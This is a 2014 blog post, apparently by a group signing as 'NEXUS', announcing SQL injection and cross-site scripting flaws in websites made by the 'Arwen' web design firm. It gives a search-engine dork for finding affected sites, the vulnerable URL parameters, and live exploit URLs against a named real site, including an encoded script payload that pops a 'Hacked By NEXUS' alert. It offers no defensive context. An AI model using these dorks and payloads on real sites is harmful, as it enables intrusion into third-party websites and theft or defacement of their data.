Friday, 4 July 2014

Arwen Cross Site Scripting & SQL Injection

Dork:
intext:"website realizado por Arwen desarrollo web y diseño"

Exploits:
http://site.com/index.php?m= <SQLI>
 http://site.com/index.php?mod= < SQLI>
 http://site.com/index.php?m= <XSS>
 http://site.com/index.php?mod= <XSS>

Live Demo: 

SQLI:
http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%27

XSS:
http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring